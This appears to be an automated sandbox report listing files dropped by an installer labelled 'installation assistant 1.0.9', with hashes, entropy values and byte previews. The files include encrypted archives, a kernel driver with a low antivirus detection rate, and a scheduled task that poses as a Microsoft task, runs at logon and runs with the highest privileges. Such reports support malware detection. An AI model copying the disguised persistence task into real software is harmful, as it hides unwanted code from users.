                              Preview:.@S....c...l ...............3...Q...R]..u&.(..c...o.A..q?oIS.j..O[..o..&....L)......Rm.jC,./....-=...Z.;..7..tH..f...n#.7.P#..#o..D..y....m........zH.!...M.|......Vs.^.Rb.X`....y.T.Sg....T.....E.?/.H.;h.)P.#.pz.LOG$..."L(.....?.D*.6g.J!.>.....f.....J..B..q...;w]9.v...V...$....L/m.H#..]...G....QQ..'.z.!NW~..R..y....E.)....m.k%....+....>....02../..M....b.l..f7..f?-~_..E.5.~....*.'....8?.n........x...#....9.........q.q.n...\....D.Uv9.9...P.j7P~q9[BV...>C..[F..k-UL(jfT..\..{d.v;.5.e.fb.3^+...Z|]S3G...$..H=.W..c...B...).v.D!...s...+.K...~=..l.2...X.m.-....m0.....p...>...d......e.J..gUr*4....vw.........T.cQ......\...]...Z{..q..n..'Ql.$..V.U9..j 4...9<..6i.....5.F.).k.LQ4.H...2..p.*.bQJ..4.K'C...#.%"q.u../zoXL...L...........'..g11=E.....y.8...~.Oe..X....u.M8.T.....Qq.m.........i....F.4e.([Hm.*...E....2........s. *R..{."4.x.]...-.....xQ@.z.......Bz.).[..C...T..".....q............M.X..CQ..A..........d...`S.3...e.X.....u.>.!..;k...>..
                              Process:C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:7-zip archive data, version 0.4
                              Category:dropped
                              Size (bytes):56546
                              Entropy (8bit):7.996966859255979
                              Encrypted:true
                              SSDEEP:1536:cWsX30GkPK2rw7bphKKdxDBxjqtalDFMflaX4:cZXhkPhr+TRJqtaK
                              MD5:4CB8B7E557C80FC7B014133AB834A042
                              SHA1:C42E2C861FF3ED0E6A11824E12F67A344E8F783D
                              SHA-256:3EC6A665E7861DC29A393D00EAA00989112E85C6F1B9643CA6C39578AD772084
                              SHA-512:A88E78258F7DB4AECD02F164E6A3AFCF39788E30202CF596F9858092027DDB2FDB66D751013A7ABA5201BFAFF9F2D552D345AFE21C8E1D1425ABBC606028C2E6
                              Malicious:false
                              Preview:7z..'....O; ........2.......D.X..Z.2..7nf..R..s# s..v.f.....%G..>..9..Jh.-j.r..q.2.=v..Q.....SW7....im..|.c...&...,.s....f.h...C.g~..f.7=9...,...sd....iD......cR.^...$..<....nd...S.O..E)0..SQ.AA.C..$.D.|. a.:..5.....b.....2......W.....Z.pS.b/.F.;|`...O/....@.......4.".b.(...4...,..h/.K$..r!...."..`.S...D?.":...n..f.{C..t..,/.S.0.N..M...v...(.Yn..-.)..-...N~....}..).. .j!...1H.7?R..X.....rKi....9.i[k..+.....Br\.=.k.t8...6Lmh.../.V^K.f.......*.@MM..`...,W.......E..v.H....0.W..~....I.....w....<....X.Azl.FH..6\.a..E?=..I.q.5...s...;.,J.0..J.../.w..,..n.EkN..,j....f.y&q.C}fnY..2\......0.....N!.J..H.H0.....BJ.Q..v}=......^c.'w..#...d.T1....#...2s}N.....2.%.?. ....l.).....a<5Y.s....}...2*.#s..]0h..._G....3].....7y.}.B.6...ywE....'q.....h..?p .#..Emm2..F..| .M.Rv!.v.G....1L.Kx...T...".a6.%S0..g..7.......J.vjO.{.A....B@.c.y>}.....N.+....:.L=[....._.....Y.{....F..|.w.oX..t&[.....a\.M..2.Qe.[}L.Ch[...G.S#.$9...8<..W.d1...*PH.`.....4.A.......?..g.
                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):31890
                              Entropy (8bit):7.99402458740637
                              Encrypted:true
                              SSDEEP:768:rzwmoD5r754TWCxhazPt9GNgRYpSj3PsQ4yVb595nQ/:vwmolXaT9abVzP1TC
                              MD5:8622FC7228777F64A47BD6C61478ADD9
                              SHA1:9A7C15F341835F83C96DA804DC1E21FDA696BB56
                              SHA-256:4E5C193D58B43630E16B6E86C7E4382B26C9A812D6D28905DD39BC7155FEBEE1
                              SHA-512:71F31079B6C3CE72BC7238560B2CBD012A0285B6A5AC162B18EAE61A059DD3B8DBCF465225E1FB099A1E23ED7BDDF0AAE4ED7C337A10DC20E0FEEC4BC73C5441
                              Malicious:false
                              Preview:.@S......................xi.\ .~.#..:}..fy?koGL^|kH.G...........x....Tg.Y.t....~^..".L.41.....R..|.....R...C.m(.M&...q.v.$..i..U.....).PY.......O.....~..p.u.Y.......{...5^q.|a.]..@DP".`Rz}...|N.uSW.......^..o...U..z...3...bH........p.......Y`..b.t.x.F^i.<.%.r.o..?w.Z..M.fI.!.a...Zsb.+.y..W...n.....;...........|.{.@Q.....#".M...4.A).#;..r...>E..]w{.-....B...........v..`...S...sY....h.Sa)...r.3.U;n8wXq.x...@^z...%8H.Zd._..f~.....u[..q$..%......C..../].rS.....".=..<o.<S....-^"..iIX..r...D.......k.P.e...U..n.]^p..pal....E.c..+..Gc..U?s.R...p...:>..v..o2..B.Hn..q...F..3.o...%.......C......*.V..|..2.J..i.r....|;T.C6).......a..~"K....Y.....]3.{{..N...X>.1.....:?....,..T+=s...............so.;....&....Q.\K..b............k,..#l...Yb...VE.g.3v.$'.H3......w.....{f..e.....PS.tQ..*.8a....5w....\8%..c.;......q.j.t0/.8s..(9....... .S...0.o.o......f*..]....U..>N....Kc/..ka.I"O-O.!./..S".IN .....%G...........x%..ZL`Sq.;.}w.`..k.....F.........Tp..}..?t..
                              Process:C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:7-zip archive data, version 0.4
                              Category:dropped
                              Size (bytes):31890
                              Entropy (8bit):7.99402458740637
                              Encrypted:true
                              SSDEEP:768:jh43RfBLJT55mgLMoqX3gX/i69sXCuWegxJr8qF88M:qhj+I7qCKNSegPnFM
                              MD5:CE6034AFC63BB42F4E0D6CD897DFBCB8
                              SHA1:49E6E67EB36FE2CCAA42234A1DBB17AA2B1C7CC0
                              SHA-256:7B7EB1D44ED88E7C19A19CEDAA25855F6800B87EC7E76873F3EA4D6A65DAA25F
                              SHA-512:7801FA33C19D6504FF2D84453F4BB810FD579CB0C8772871F7CC53E90B835114D0221224A1743C0F5AAE76C658807CC9B4EC3BEC2CAD4AB8C3FD03203DAA7CF0
                              Malicious:false
                              Preview:7z..'....oYU@|......2.........Z....f..t.#.............tb.7E..Jo.........b.I=.Y..6(..=....^..>i.^E.."q.$&8....N...p+.p. .P.z6.b,.8kdD......'...G.R.n.&5..C..H.E..So!T^n{.a#d....z.SB........Nb.........LO+B ...iV..HH.Cc*.o@|.....Yvxb^.cW....._.........m.}.(V.i.H$....R....`.M.p......A?....._..nb..D.*RT<bUV.n].....LD.qU.....U9....]...h..y!...I....&C......g`...YahZ.q4.{.....2ZRG..f.. .M....:t .........8..Eg.....o.....h.]{..........p...M...lh.@.(R.]!B.:...b78$...b.......hc...C~....I..B<.x_OB|...<. .=NZ.....z........sjJ.....*{<..L.......^...9..^d..$d..}......#.dL'~.}....M...j.(5..@.tcVm.H..-.n...D..&....<..Z...@]./7?...[..qfW..!...v...==..d..M..om~).....C..9....c<..WUV.ed.h...]....OCt(X.H<<:.9..{5j....Nh.L.$..>..D..haP..~...............}r=!.E.ng..........9+...2.g.H3Lx.Bu....]jC...q.g.g.U.4..<........)....oo.T.c_.......X.,.@...nu......D.B(~.5....x5...............4S7B..p...Uk.0-m.VM.M@.V\.o...(......".k..w....Z.([.@.MQ.i9..."W..m...N.,.
                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):74960
                              Entropy (8bit):7.99759370165655
                              Encrypted:true
                              SSDEEP:1536:x2PlxAOr0Y07RqyjjkFThaVNwDsKsNFBrFYek36pX4MDVuPFOnfIId+:QAOrf07RHjkFThaVGMLF3hNDcPFOn5s
                              MD5:950338D50B95A25F494EE74E97B7B7A9
                              SHA1:F56A5D6C40BC47869A6AE3BC5217D50EA3FC1643
                              SHA-256:87A341B968B325090EF90DFB6D130ED0A1550A1EBDE65B1002E401F1F640854A
                              SHA-512:9A6CC00276564DDE23D4CABA133223D31D9DDD06D8C5B398F234D5CE03774ED7B9C7D875543E945A5B3DB2851EC21332FE429A56744A9CC2157436400793FF83
                              Malicious:false
                              Preview:.@S........................F.T....r...z'I.N..].u.e.e..y.....<|r.:v.....J.i...L.Sv.....Nz..,..K.sI*./.d.p.'.R.....6eF....W{."J.Nt'.{E....mU_..qc.G..M..y.QF)..N..W.o.D!.-...A$.....Nc.(...~.5.9'..>...E..>.5n..s..W.A7..../..+..E.....v..^&.....V..H6..j..S`H.qAG.R.i^&....>@SYz.@......q.....\t=.HE...i..".u.Z.(y.m..3.0\..Wq9#.....iH7..TL.U..3,b........L...D..,..t(mS..06...[6.y....0-....f.N7..R......./..z.bEQ.r..n.CmB'..@......(...l..=.s........`.6.?..[mzl....K.5"..#*.>.~..._...A.%b..........PnI.T...?R~JL<.$V..-.U..}\..t/F..<..t....y(K..v..6"..'.!.*z.R....EJ0.d<v:.R&......x...2....;Tc..(..dW...7a.)...rq.....{"h.wbB..t)f..qj........~.XR.a/........l./.S......".%?.C.cL._.,k.n'....a./.z...{.]...<......._pFP..d..,......Q...[........3...Kq).rJ..8..I.)o...i'Q..=......(dq(.m../..%=.......r m.X|3.......b.~tA.......%+.T..E@..ce...%....,..x#...,....-....A...q.....r.+...?......L..%.c.... ..>.Iw......P...O)...$`.'..D1.r.....*..9;..R...VL.]..%j.....TM.4.....P.L...
                              Process:C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:7-zip archive data, version 0.4
                              Category:dropped
                              Size (bytes):74960
                              Entropy (8bit):7.997593701656546
                              Encrypted:true
                              SSDEEP:1536:xsn0ayGU0SfvuEykcv5ZUi4Q9POZBgfmWRDOs2XwV1NN4+8wbr82nR+2R:xY0ntfvwkcv5ZwYPCBgfmW/VDS+FbrLN
                              MD5:059BA7C31F3E227356CA5F29E4AA2508
                              SHA1:FA3DC96A3336903ED5E6105A197A02E618E3F634
                              SHA-256:1CBF36AFC14ECC78E133EBEC8A6EE1C93DEA85EEC472CE0FB0B57D3E093F08CC
                              SHA-512:E2732D3E092B0A7507653A4743E1FE7A1010A20D4973C209BA7C0B2B79F02DF3CFDB4D7CE1CBFB62AA0C3D2CDE468FC2C78558DA4FF871660355E71DC77D8219
                              Malicious:false
                              Preview:7z..'....G8{p$......@..........0..$D.#'7..^..G.....W.K^.IC;.k...)_...S...2..x.....?(..Rj.g.......B...C..NK.B0s..L?.$..].....$r..E.]~...~K..E..3.......t..k..J......B...4.?!..6r.Qqc.5.r...\..,A.JF.J...Vb..b...M.=^.K7..e..]...X.%^3T...D.y..e2..>...k...\...S.C....')......hhV..K...z4..$d....a[.....6.&.D.:.=^.8.M[....n..i[....]..Y.4...NpkjU..;..W5.#.p.8?u....!.......u.[?.$..^.}f.A..G.N...b7.*...!!.(.....Gc..........Dg....Z.*.#.\".e.m.).t.5..r...6"....Q......fx..W......k..K7^."C.4*Z.{.^WG.....Z..P......Z....7R.....5hy...s....b.....7.V.....k.=.y.i.i......Y.......FY$.|T.5..V...E|...q.........].}bl...y.....;...q....-a..RP3..L~k....|..p_......."......rJz."..v......Z....l1.O.N...Di...O.:m.X...W.......x..}..>ktk.,.~...n-.m..`...G......$.....].lPx..<..9.m4.n...d....G...{'.a........u).R.+.....y.`.p...1@..!..b...J.W..Vt,......h...k....W.,..@Sd.<ZG......}&.R.]p(Y...o...r.4m:.J`.U..S5.iN...^!Y..hHP.B.58....JvB.K.k;...4........\.6=&erz..2..&...Z.C...h_.
                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):29730
                              Entropy (8bit):7.994290657653607
                              Encrypted:true
                              SSDEEP:768:e7fyvDZi63BuPi2zBBMqUp6fJzwyQb91SPlssLK4:AfKNiG/2vMx6fJzwVb2tss7
                              MD5:2C3E0D1FB580A8F0855355CC7D8D4F7A
                              SHA1:177E4A0B7C4BC8ACE0F46127398808E669222515
                              SHA-256:9818FEBDE34D7E9900EB1C7A32983CA60C676BE941E2BC1ED9FBD5A187C6F544
                              SHA-512:B9410FC8F5BE02130D50E7389F9A334DD2F2A47694E88FBB9FB4561BD3296F894369B279546EEBB376452DF795C39D87A67C6EE84C362F47FA19CF4C79E5574E
                              Malicious:false
                              Preview:.@S....*z.p,..................kcn..a.^.<..=......7`....6..!`...W.,2u...K.r.1.......1...g<wkw.....q..VfaR...n.h.0b[.h.V$..7.7'd.....T.....`.....)k.....}..........bW'.t..@*.%e5....#.6.g.R.......,W....._..G.d...1..e/...e7....E.....b....#Z,#...@.J.j?....q.ZR.c.b.V....Y-.......3..&E...a.2vg$..z...M9.[......_.1U....A...L.0+3U.[)8...D........5......[..-.u...ib...[..I-....#|j..d..D.S.'.....J.`.....b..y...Iu.D.....2.r}.4....<K.%....0X..X[5.sD...Xh.(G...Z;.."..o..%.......,.y..\..M6.+,.]c..t.:.|...p%.../1%.{>..r..B..yA.......}.`.#.X....Rl`.6\~k.P8..C....V\^..2.7...... h. .>....}..u)..4..w..............^N...@.v....d.P...........IA.. G?..YJ>._La..Y.@.8N.a...BK.....x.T....u.....\x.t...~.2p.M..+.R&w.......7c!v.@..RGf.F.>^+.b=........@l.T5.:........#}.%>.-.C.[XR.TG.\..'....MH..x..Y...cL........y.>....%...:.S.W^..k.EE.5O`.6<5-kh_...."95..:p....P.jk`....b.7.Z.8Y....H(j2y..`d.q;RyZ.5$..3.;......0,......+O.....L.,..u.s....S.1o.g...l"..e.....Cy<....I.+..B@......~.0...<.
                              Process:C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:7-zip archive data, version 0.4
                              Category:dropped
                              Size (bytes):29730
                              Entropy (8bit):7.994290657653608
                              Encrypted:true
                              SSDEEP:768:0AnbQm4/4qQyDC44LY4VfQ8aN/DObt1dSt3OUqZNKME:0ab6c4oY0aBDObjot+Uqu7
                              MD5:A9C8A3E00692F79E1BA9693003F85D18
                              SHA1:5ED62E15A8AC5D49FD29EF2A8DC05D24B2E0FC1F
                              SHA-256:B88E3170EC6660651AF1606375F033F42D3680E4365863675D0E81866E086CC3
                              SHA-512:8354B80622A9808606F1751A53F865C341FF2CE1581B489B50B1181DAA9B2C0A919F94137F47898A4529ECCCD96C43FCCD30BCDF6220FA4017235053AF0B477D
                              Malicious:false
                              Preview:7z..'....G..s......2......../.....h..f...H=...v.:..Q.I..OP.....p..qfX.M.J..).9;...sp......ns./..;w....3.<..m..M.L...k..L..h[-Dnt.*'5....M(w%...HVL..F&......a...R.........SF.2....m@X&X5.!....ER......]xm.....\.....=.q.I.}v.l#.B........:.e....b6.l.d..O......H.C..$.',.B..Q\..\.B.%...g...3?.....*.XuE.J.6`.../...W.../......b..HL?...E.V[...^.~.&..I,..xUH..2V..H..$..;.....c.6.o........g.}.u:.X....9...|Ynic.*.....ooK..>..M~yb..0W....^..J(S......Q?...#.i.1..#.._.9..2E.S7c.....{..'...j.A.p......dS]......i.!..YS...%.Q<..\.0.....FNw....e...2...$..$4..Pv.R...mv...-.b.T.)..r*..!..).n4.+.l[.N...4qN....w.B..[......<U.etA.A....SB..^y.......^0.f._.&..Z.zV.%.R.f_dz.,E..JJ..%.R.7.3m.:..;.`...AoHLHC..|..)f...C....$...E....H"x..F....wW...3"......Y.*Y.....5....,E...tn.KS...2......w\Z..1.".O.=+..A...2.....A.........k. c..../2..i!q..q...u.'.m.6.j.\.....x...S....$....*.&(.).^..f.d.g"j..#^....W.]{.C.?2Z.'X...5.._@..q.j..Xb...n{1..<.i...'r...7'.F.L\(.8
                              Process:C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:7-zip archive data, version 0.4
                              Category:dropped
                              Size (bytes):249984
                              Entropy (8bit):7.999161200123717
                              Encrypted:true
                              SSDEEP:6144:BBfinFeH/n/oxa9p5nKMF7W9uvN/jl3eTYjg0c+YRRbMQL:BBfiFePQxa9pFhYmN/S0rgRZ
                              MD5:7A1992BF55B34786E192E7FF0E870B6C
                              SHA1:CF5E5EB0C9133A9E6162731440462B88191F4672
                              SHA-256:187BCFD1E40E2DF985E8F3456ECC94347C608C8151BF7F1A4524D66B118A7B60
                              SHA-512:48792B91D46D070A6B4D97D072CCF302452C163A5576D419398FAD3D958ADF19B5739BC026068984C149F20051CBEB0DAB91EFF47468E6AD7EBEB2B08003F29D
                              Malicious:false
                              Preview:7z..'...;.(J .......@.......>.~..r"&9.d.[|6..]T..a.]...4..6.......I".w....s...V...l..;B..?..'.5.y.."..8. .?YM....9.]..^.....!..8C$..=1... 3..V.}.e3._.............UI...m..%....jl....g..~O....R..#|.7.M....h.<....X(yCa...).5..\8.......= zg....?U..8...9.]B}...dWm>.|../..=..@.. ....@O..H|.C*..oe.H...;..`.t..a....p.$...Y-n.7{..XX.G.Ex.|.>.`.(G..e.Lz......]r....?.....x.B.g..5....\.......h...:u...6...q.........f|.L....z.~..s..X.]...G<k&....."c9...}..&.t!...<.+.#..2..w.<........T..7...%..4........ly!.f....d...}...(P...O.EHU|i9...a.'%...X.4...W...#....[....>..TD"}...|.].Np..E=b...d3...l....K..9%;.0...........R+..fQ...#0...`...J.......YEtk-...7......=k...b;.H&...^(\t....Qg..2.....z...tb.h..W.u..'.=..u..h_H. W.../.Y...7.....n.'p.Ys.uV<m#....K#.#;.0B..b&=9..Q./7..L.;.=3...8i.=2M.<.............Y.h._.E...Ft..TS.....=....O.*...E....y..........z,..F..1.K...d..l.CYE.x..E@...O\.fQ.....C.j#..B.x.Qs.?..N34'....'.S<.....gC!x.........0......`...((6Di... F|.
                              Process:C:\Program Files (x86)\Windows NT\7zr.exe
                              File Type:PE32+ executable (native) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):63640
                              Entropy (8bit):6.482810107683822
                              Encrypted:false
                              SSDEEP:768:4l2NchwQqrK3SBq3Xf2Zm+Oo1acHyKWkm9loSZVHT4yy5FPSFlWd/Ce34nqciC50:kgrFq3OVgUgla/4nqy5K2/zW
                              MD5:B4EAACCE30F51EAF2A36CEA680B45A66
                              SHA1:94493D7739C5EE7346DA31D9523404D62682B195
                              SHA-256:15E84D040C2756B2D1B6C3F99D5A1079DC8854844D3C24D740FAFD8C668E5FB9
                              SHA-512:16F46ABE2DD8C1A95705C397B0A5A0BC589383B60FE7C4F25503781D47160C0D68CBA0113BA918747115EF27A48AB7CA7F56CC55920F097313A2DA73343DF10B
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 9%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s.[.7.5N7.5N7.5N7.4NX.5NA'NN4.5NA'HN5.5N.|XN4.5N.|HN6.5NA'XN6.5N.|DN0.5N.|IN6.5N.|MN6.5NRich7.5N........................PE..d....(gK..........".........."............................................... ..............................................................d...(........................(.......... ................................................................................text............................... ..h.rdata..............................@..H.data...............................@....pdata..............................@..HINIT................................ ....rsrc...............................@..B.reloc..0...........................@..B................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:data
                              Category:dropped
                              Size (bytes):4096
                              Entropy (8bit):3.3482223822620667
                              Encrypted:false
                              SSDEEP:48:dXKLzDln/L6w0QldOVQOj933ODOiTdKbKsz72eW+5y4:dXazDlnewhldOVQOj6dKbKsz7
                              MD5:1E1D0466AB0FE8F2802587D337A10567
                              SHA1:362B3B6EFBE51EBD0702167061812CA567BB11BD
                              SHA-256:8B761FF2FDDF15A5E1AB4758D2112550B9A857F3B77F6A8EDC5F33586AEA06EC
                              SHA-512:4F37DAE32D421BB88B4C2B079461BE28F47343E84A1546519CC8107C2A842C16D14D736504457E4586BFB92E68B01D905BC3B45C4F68FA1FF6E87B41A9996809
                              Malicious:false
                              Preview:<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2005-10-11T13:21:17-08:00</Date>. <Author>Microsoft Corporation</Author>. <Version>1.0.0</Version>. <Description>Microsoft</Description>. <URI>\kafanbbs</URI>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user</UserId>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="System">. <UserId>user</UserId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwo
                              Process:C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                              Category:dropped
                              Size (bytes):5649408
                              Entropy (8bit):6.392614480390128
                              Encrypted:false
                              SSDEEP:98304:jgRfP5jnFTyGZEWxSIBHVGT+t1ufqchZ:kRZDFTyGaHIJoWofqc
                              MD5:8C71B86BF407C05BAF11E8D296B9C8B8
                              SHA1:6624AB8CA883C48F02C58250D4EEE9E90098F4E4
                              SHA-256:BE2099C214F63A3CB4954B09A0BECD6E2E34660B886D4C898D260FEBFE9D70C2
                              SHA-512:BB3FEE727E40F8213F0A7D9808048E341295A684ECBA6F4DF52F1B07B528D7206CA41926B2433F4B63451565AD2854570FEE976BC7051B629ACD24FCA6D0F507
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................&.ZF..0V..<.............@..............................V.....L.V...`... ...............................................V../...........0O..............`V.\a...........................vL.(.....................V..............................text....XF......ZF.................`..`.data....z...pF..|...^F.............@....rdata.. 9....F..:....F.............@..@.pdata.......0O.......O.............@..@.xdata........Q.......Q.............@..@.bss.....;....U..........................idata.../....V..0....U.............@....CRT....h....@V.......U.............@....tls.........PV.......U.............@....reloc..\a...`V..b....U.............@..B................................................................................................................................................................................................................
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):64
                              Entropy (8bit):1.1940658735648508
                              Encrypted:false
                              SSDEEP:3:NlllulxmH/lZ:NllUg
                              MD5:D904BDD752B6F23D81E93ECA3BD8E0F3
                              SHA1:026D8B0D0F79861746760B0431AD46BAD2A01676
                              SHA-256:B393D3CEC8368794972E4ADD978B455A2F5BD37E3A116264DBED14DC8C67D6F2
                              SHA-512:5B862B7F0BCCEF48E6A5A270C3F6271D7A5002465EAF347C6A266365F1B2CD3D88144C043D826D3456AA43484124D619BF16F9AEAB1F706463F553EE24CB5740
                              Malicious:false
                              Preview:@...e................................. ..............@..........
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:PE32+ executable (console) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):6144
                              Entropy (8bit):4.720366600008286
                              Encrypted:false
                              SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                              MD5:E4211D6D009757C078A9FAC7FF4F03D4
                              SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                              SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                              SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d.....R..........#............................@.............................`.......,......................................................<!.......P..H....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...H....P......................@..@................................................................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-OSNSA.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                              Category:dropped
                              Size (bytes):3598848
                              Entropy (8bit):7.004949099807939
                              Encrypted:false
                              SSDEEP:49152:OLI2LSDJWhsk/42oQ6C+NkdkcQdhjee71MzuiehWIKxZUQjOlwz+cxtVI8q29Zlc:OLVLAJG42oaPQdhCe71MzSRsyo29Al
                              MD5:1D1464C73252978A58AC925ECE57F0FB
                              SHA1:30E442BE965F96F3EB75A3ABDB61B90E5A506993
                              SHA-256:05184064FB017025E0704D75D199BAE02EBBD30AE4D76FB237DF9596CE6450AA
                              SHA-512:40165B34D6BC63472C3874AAC1FB25B19880F5DFE662F672181728732DC80503A64EF4A8058A410755A321D6BDB7314387464DD8243D6E912F37D5032177928A
                              Malicious:false
                              Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....gg...........!.....b..........%........................................p7...........@.........................HC.......J..<.... 7.X....................07.8?..........................x........................K...............................text...`a.......b.................. ..`.rdata..<............f..............@..@.data................\..............@....00cfg.......`(.......(.............@..@.tls.........p(.......(.............@....voltbl.F.....(...... (..................=~ .........(......"(............. ..`.rsrc...X.... 7.......6.............@..@.reloc..8?...07..@....6.............@..B................................................................................................................................................................................................................................................................................
                              Process:C:\Users\user\AppData\Local\Temp\is-KVSIT.tmp\#U5b89#U88c5#U52a9#U624b_1.0.9.tmp
                              File Type:PE32+ executable (console) x86-64, for MS Windows
                              Category:dropped
                              Size (bytes):6144
                              Entropy (8bit):4.720366600008286
                              Encrypted:false
                              SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                              MD5:E4211D6D009757C078A9FAC7FF4F03D4
                              SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                              SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                              SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                              Malicious:false
                              Antivirus:
                              • Antivirus: ReversingLabs, Detection: 0%
